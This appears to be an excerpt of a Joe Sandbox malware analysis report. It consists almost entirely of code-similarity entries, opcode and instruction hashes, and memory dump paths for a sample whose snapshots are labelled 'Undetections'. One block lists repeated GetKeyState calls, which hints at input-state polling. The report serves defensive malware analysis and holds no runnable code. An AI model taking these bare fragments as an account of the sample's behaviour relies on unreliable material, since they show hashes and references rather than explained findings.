                                                                                                                                                                                                            • Opcode ID: b83c5fc083bd0bc286f26ff2332a4314650da183d4b89b1e44b7231a965aef6b
                                                                                                                                                                                                            • Instruction ID: 175dc5fe2237f86850e2a0de951482dde98610c69d95f7032ddbcbe774a74dde
                                                                                                                                                                                                            • Opcode Fuzzy Hash: b83c5fc083bd0bc286f26ff2332a4314650da183d4b89b1e44b7231a965aef6b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 48E092716087029F8A349A2A9A84833BBEDFB842543004DBEE94BC7710DA36F845C6A0
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4313638841.0000000016DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 16DE0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_16de0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 1b65b4514d1a18ae56a951ccdc5570f918a8fa576f206925cfb3472e7e5ceca6
                                                                                                                                                                                                            • Instruction ID: 085a0c2d34969622c8a0e27c5cd91bef76884cb49a801b1b9c040c6977339072
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1b65b4514d1a18ae56a951ccdc5570f918a8fa576f206925cfb3472e7e5ceca6
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1DF0D474E41218EFCB44EFE8C840AAEBBF5FB45200F1085AA9418A3380DB706E45CB94
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4313638841.0000000016DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 16DE0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_16de0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: fee15a1b873d9877c9d94f2fde5dc0073e7e5cd6dbc77ee68894da893b829969
                                                                                                                                                                                                            • Instruction ID: 0e78b5f28703a33dd7000e1f50661fb6b5dc74a581c7a0f1e070e35f282982d7
                                                                                                                                                                                                            • Opcode Fuzzy Hash: fee15a1b873d9877c9d94f2fde5dc0073e7e5cd6dbc77ee68894da893b829969
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 78F0D474E01208AFCB44EFE8C840AAEBBF6FB45200F1085A99818B3380DB706E45DB95
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.4108374729.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5fb0000_Undetections.jbxd
Memory Dump Source
• Source File: 00000000.00000002.4313638841.0000000016DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 16DE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_16de0000_Undetections.jbxd
                                                                                                                                                                                                            • Instruction ID: 7b6d198f93f12ba7675076ce2d3aad82978e3fe7190984b623d0ff77eea8879e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: b1913c9b9488e1a2b52cac5649508cfce1cda1ef2f47aece28740e509fa577b7
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D0E04F30419209CFC300BB24E94BB0ABFA6F740304F54846AE0048F225DBBAD889CB41
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4313638841.0000000016DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 16DE0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_16de0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: d8aeb14b5f525603a771938cae82dcff7a999e740f3d1e33001694bc0838ef04
                                                                                                                                                                                                            • Instruction ID: 69ce76ca4a1f9dc831f9a61682fb24679e7438f3245700feb677201d6d6bcb08
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d8aeb14b5f525603a771938cae82dcff7a999e740f3d1e33001694bc0838ef04
                                                                                                                                                                                                            • Instruction Fuzzy Hash: EFF0C939900108EFCB41DF94D944E98BBFAFB48310B15C095E9098B221D7329A11EB50
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4108374729.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5fb0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 472c7226f632da6d0d0d6b547043c8f15871315328a94e80ca5d58f5adf6ad0b
                                                                                                                                                                                                            • Instruction ID: 202dfed7340075aa3f4874daa9409bcfa23da8e88f08cb616e06252c505ae2bd
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 472c7226f632da6d0d0d6b547043c8f15871315328a94e80ca5d58f5adf6ad0b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F1E0DF38908208ABC715DFA8EA45B9CBF79FB45309F3884ECE84923304CB315E12CB40
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4108374729.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5fb0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: bd7335d8c658f1bc823d91b838358a5d914ef19c4d53c2a466518fd21c4981c5
                                                                                                                                                                                                            • Instruction ID: ac2555a169d50ba9fdcab7cde47b594a482a74b2b17406f05254b104a3458f92
                                                                                                                                                                                                            • Opcode Fuzzy Hash: bd7335d8c658f1bc823d91b838358a5d914ef19c4d53c2a466518fd21c4981c5
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8AE0D83490920CEBCB04DBA8E901B5CBF75F745304F2081D8D85523344C7365D43D744
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4108374729.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5fb0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: b39489e9b438d5307e864374809e7b5caec98f615351c13413ab11dbd0ef076e
                                                                                                                                                                                                            • Instruction ID: 847af4abeb50f6921986435ecf064f377a5f995aca541bae1b94ea21e39aa9a4
                                                                                                                                                                                                            • Opcode Fuzzy Hash: b39489e9b438d5307e864374809e7b5caec98f615351c13413ab11dbd0ef076e
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 59E09274A08105EFCB00EFA0E642A5D7FA5EF44200F2045ADE849A7316DB326E009750
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4108374729.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5fb0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: d491630f2d08b856edb1b2bec031937727497a266b194e806659e582c9e694e8
                                                                                                                                                                                                            • Instruction ID: df143dc8940bf60200c91feea724d23690a58a507cfa66723b3df5498fc11273
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d491630f2d08b856edb1b2bec031937727497a266b194e806659e582c9e694e8
                                                                                                                                                                                                            • Instruction Fuzzy Hash: CDE02B3091D155DBC705DBA4AD0577DBF3DF743219F0020D8A109A3151CF345921C380
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4108374729.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5fb0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 46d69475036daea2cc7ea21890e2bac6e181dd71b49cbf5f75fe48d9700330d0
                                                                                                                                                                                                            • Instruction ID: dd86ec74e58aa850afa07bb8c0e684dfc996709424e471c022e1204c67515898
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 46d69475036daea2cc7ea21890e2bac6e181dd71b49cbf5f75fe48d9700330d0
                                                                                                                                                                                                            • Instruction Fuzzy Hash: A7D02E30906309A7C308EBB4EA167BEBF78E703249F6034E8E40223100CA385D02E345
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4313638841.0000000016DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 16DE0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_16de0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: a3ff4dd365633bba1768250739bdb594dc62a9a2b31da28daa5aeac068c49030
                                                                                                                                                                                                            • Instruction ID: 257f5bee82b5116d5a1874f10d6912ece4d4818b305c4e858fc79fbc16dad45b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: a3ff4dd365633bba1768250739bdb594dc62a9a2b31da28daa5aeac068c49030
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4DE0CD35B047904FCB74D66ED50015DF3E1EB80634714072AC125D37D3DE656D0587D1
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4108374729.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5fb0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: e7acefc8409bd096d377aa81cd59b6b87bae7368a8ace00e89846b4b1089562f
                                                                                                                                                                                                            • Instruction ID: 1a6c86032b77859a0a5530e1554bf9479509a0766d4c0f1d3e703c0d74b8e1df
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e7acefc8409bd096d377aa81cd59b6b87bae7368a8ace00e89846b4b1089562f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 24E08634914208DFC704EFA8D540959FB79FB85300F10C29EDC0457340EB72AE45DB91
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.4108374729.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5fb0000_Undetections.jbxd
Memory Dump Source
• Source File: 00000000.00000002.4313638841.0000000016DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 16DE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_16de0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: c01c42f69c0f66fecf0797e25c5eba3b300654417a9f667fefa694d5bda79150
                                                                                                                                                                                                            • Instruction ID: 6e48d05f6ec9143a726343092258b3ce36f82877a311c39fd991bbbff75e2932
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c01c42f69c0f66fecf0797e25c5eba3b300654417a9f667fefa694d5bda79150
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 29E0EC78A05208EBCB04DFA4E94196CBBB5EB45315F1091A9D80427344CB326E56DB95
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4108374729.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5fb0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 1b6a09b6959a3c85a3abc4e5fd1cf11d4e12ec8362949d5b32d71a30dfb60250
                                                                                                                                                                                                            • Instruction ID: 7b518826c6bbef32b40bd40a9ead71797b4546d3b6c55c88f7dd542b8f7b0300
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1b6a09b6959a3c85a3abc4e5fd1cf11d4e12ec8362949d5b32d71a30dfb60250
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 58D0A970C1A208DBCB18EFA8E509A7ABB7CEB03206F0021A9A50963210DF706E20D795
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4108374729.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5fb0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 0eb7dc4ad22091b04ed2a47e04dc0679f9bc6ab22f2c54d904226ec16807b41b
                                                                                                                                                                                                            • Instruction ID: d22629ae72ee72b4b20a541f4b9ac44ee7525616f65c8973ef550fb9954ceac2
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0eb7dc4ad22091b04ed2a47e04dc0679f9bc6ab22f2c54d904226ec16807b41b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 64D02230E4220EABC304EFE8DA29A7EBB3CEB03289F0025FC940423200CF785E00C285
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4108374729.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5fb0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 7322ddd8c839eb1ec4067c8535092e0d172502ed1e40879ae8636ab1804a42e1
                                                                                                                                                                                                            • Instruction ID: 681a8bbd62682108c812b8a1f8119267fa94cbb86426ab189a250c6801dfc2dc
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7322ddd8c839eb1ec4067c8535092e0d172502ed1e40879ae8636ab1804a42e1
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B8D0A76110930446E614AAD89A053B03B47DB41358F182660AA09166E0DB64A452A355
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4313638841.0000000016DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 16DE0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_16de0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: f97b52c713c47b4b39d7a826e5d9ba9bb23f9730735f4cb20a3eb16542c26572
                                                                                                                                                                                                            • Instruction ID: 5123b92da1957a72f4a4539eb0bd476c01db0df8e578783aaa46895764e652a7
                                                                                                                                                                                                            • Opcode Fuzzy Hash: f97b52c713c47b4b39d7a826e5d9ba9bb23f9730735f4cb20a3eb16542c26572
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 94E0C2B524A3808FCB070B34541002C7F229FDB225B0880FFD4804A157DA3B4969E3A2
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4108374729.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5fb0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 64c5874eaa5ad0bea4a0b3298e3968c6d6e6ba86a4e17871c27dedf469a2132f
                                                                                                                                                                                                            • Instruction ID: f6531f304c048cd62a763834bece24bfe66959d78544ba1c969b498589fcb070
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 64c5874eaa5ad0bea4a0b3298e3968c6d6e6ba86a4e17871c27dedf469a2132f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F7E0E27594010ACFC700DF68D699AADBFB0AB0C304F208469E41AE7260CB389804EF50
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4108374729.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5fb0000_Undetections.jbxd
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4108374729.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5fb0000_Undetections.jbxd
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4108374729.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5fb0000_Undetections.jbxd
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4108374729.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5fb0000_Undetections.jbxd
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4313638841.0000000016DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 16DE0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_16de0000_Undetections.jbxd
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4108374729.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5fb0000_Undetections.jbxd
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4108374729.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5fb0000_Undetections.jbxd
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4313638841.0000000016DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 16DE0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_16de0000_Undetections.jbxd
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4313638841.0000000016DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 16DE0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_16de0000_Undetections.jbxd
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%


                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetKeyState.USER32(00000001), ref: 0F0FE335
                                                                                                                                                                                                            • GetKeyState.USER32(00000002), ref: 0F0FE37A
                                                                                                                                                                                                            • GetKeyState.USER32(00000004), ref: 0F0FE3BF
                                                                                                                                                                                                            • GetKeyState.USER32(00000005), ref: 0F0FE404
                                                                                                                                                                                                            • GetKeyState.USER32(00000006), ref: 0F0FE449
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4308818025.000000000F0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F0F0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_f0f0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: State
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1649606143-0
                                                                                                                                                                                                            • Opcode ID: 811eb73ad4559f52eceb6f82fbd5b185c2bab3aac449a81d77854ee231b5d561
                                                                                                                                                                                                            • Instruction ID: 37304eb648523e7dbc081462f2384e8927be86a9400c016de831c48aaa09bdb3
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 811eb73ad4559f52eceb6f82fbd5b185c2bab3aac449a81d77854ee231b5d561
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8E4184709057468FDB21DF59C94C3AFBFF4EB04308F248459D289A76A1C778A589CB92
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4313638841.0000000016DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 16DE0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_16de0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: poq
                                                                                                                                                                                                            • API String ID: 0-1570044193
                                                                                                                                                                                                            • Opcode ID: 80a5c9dd598399d7aa49cbb6198bf9f2ef6b7c974abf84a8d5c670787ad0096f
                                                                                                                                                                                                            • Instruction ID: 1509ed69a1eabac4b27035cbeb1e8f9b3b654341fe8944e8b8027c9766a356ca
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 80a5c9dd598399d7aa49cbb6198bf9f2ef6b7c974abf84a8d5c670787ad0096f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5102F275A00218DFDB55CFA9C980E99BBB2FF49304F1580A9E508AB332D731E995DF40
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4104612227.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_4ea0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: poq
                                                                                                                                                                                                            • API String ID: 0-1570044193
                                                                                                                                                                                                            • Opcode ID: c43fc2ca2f64a35d307c7a7bc1d10a082f1e078edad63b51fa23c5b564cd5d85
                                                                                                                                                                                                            • Instruction ID: 14f701cb00f50b6012cd271a6ff7a2bd0a31eb9c043d9b1bab14ab0b85987af0
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c43fc2ca2f64a35d307c7a7bc1d10a082f1e078edad63b51fa23c5b564cd5d85
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B902C375A00218DFDB15CFA9C984E9DBBB2FF49304F1590A9E609AB236D731E991DF00
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4314104630.0000000016E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 16E20000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_16e20000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: d9a5c2706d1c7e4462b62c3f8926846d4e36210359435fe65774722e0d65ede7
                                                                                                                                                                                                            • Instruction ID: a52c805bf8a57bb38cd047f181aa150d57d056496d5712139e8b4a94f49c0c3a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d9a5c2706d1c7e4462b62c3f8926846d4e36210359435fe65774722e0d65ede7
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F0026175D012698FDB60CFA9C880BDDB7F1BF59310F1086AAE859B7250E770AA94CF50
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4104612227.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_4ea0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
